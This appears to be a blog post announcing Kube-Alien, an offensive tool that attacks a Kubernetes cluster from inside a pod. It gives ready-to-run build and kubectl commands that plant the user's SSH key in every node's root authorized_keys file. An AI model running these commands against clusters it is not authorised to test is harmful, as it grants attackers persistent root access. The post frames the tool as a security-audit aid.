Kube-Alien : Tool To Launch Attack On k8s Cluster

Kube-Alien tool launches attack on k8s cluster from within. That means you already need to have an access with permission to deploy pods in a cluster to run it.

After running the kube-alien pod it tries to takeover cluster’s nodes by adding your public key to node’s /root/.ssh/authorized_keys file by using this image https://github.com/nixwizard/dockercloud-authorizedkeys (Can be adjusted using ADD_AUTHKEYS_IMAGE param in config.py) forked from docker/dockercloud-authorizedkeys.

Also Read – Firmware Analysis Toolkit : To Emulate Firmware And Analyse It For Security Vulnerabilities

The attack succeedes if there is a misconfiguration in one of the cluster’s components it goes along the following vectors:

  • Kubernetes API
  • Kubelet service
  • Etcd service
  • Kubernetes-Dashboard

The purpose of this tool

  • While doing security audit of a k8s cluster one can quickly assess it’s security posture.
  • Partical demostration of the mentioned attack vectors exploitation.

How can k8s cluster be attacked from within in a real life

  • RCE or SSRF vunerability in an app which is being run in one of your cluster’s pods.

Usage

Kube-alien image should be pushed to your dockerhub(or other registry) before using with this tool.

git clone https://github.com/nixwizard/kube-alien.git
cd kube-alien
docker build -t ka ./
docker tag ka YOUR_DOCKERHUB_ACCOUNT/kube-alien:ka
docker push YOUR_DOCKERHUB_ACCOUNT/kube-alien:ka

The AUTHORIZED_KEYS env required to be set to the value of your ssh public key, in case of success the public key will be added to all node’s root’s authorized_keys file.

kubectl run –image=YOUR_DOCKERHUB_ACCOUNT/kube-alien:ka kube-alien –env=”AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)” –restart Never

or you may use my image for quick testing purpose:

kubectl run –image=nixwizard/kube-alien kube-alien:ka –env=”AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)” –restart Never

Check Kube-alien pod’s logs to see if attack was successful:

kubectl logs $(kubectl get pods| grep alien|cut -f1 -d’ ‘)

Download
R K

Share
Published by
R K
Tags: k8sk8s ClusterKube-Alien
6 years ago

Recent Posts

How AI Puts Data Security at Risk

Artificial Intelligence (AI) is changing how industries operate, automating processes, and driving new innovations. However,…

21 hours ago

The Evolution of Cloud Technology: Where We Started and Where We’re Headed

Image credit:pexels.com If you think back to the early days of personal computing, you probably…

5 days ago

The Evolution of Online Finance Tools In a Tech-Driven World

In an era defined by technological innovation, the way people handle and understand money has…

5 days ago

A Complete Guide to Lenso.ai and Its Reverse Image Search Capabilities

The online world becomes more visually driven with every passing year. Images spread across websites,…

6 days ago

How Web Application Firewalls (WAFs) Work

General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…

1 month ago

How to Send POST Requests Using curl in Linux

How to Send POST Requests Using curl in Linux If you work with APIs, servers,…

1 month ago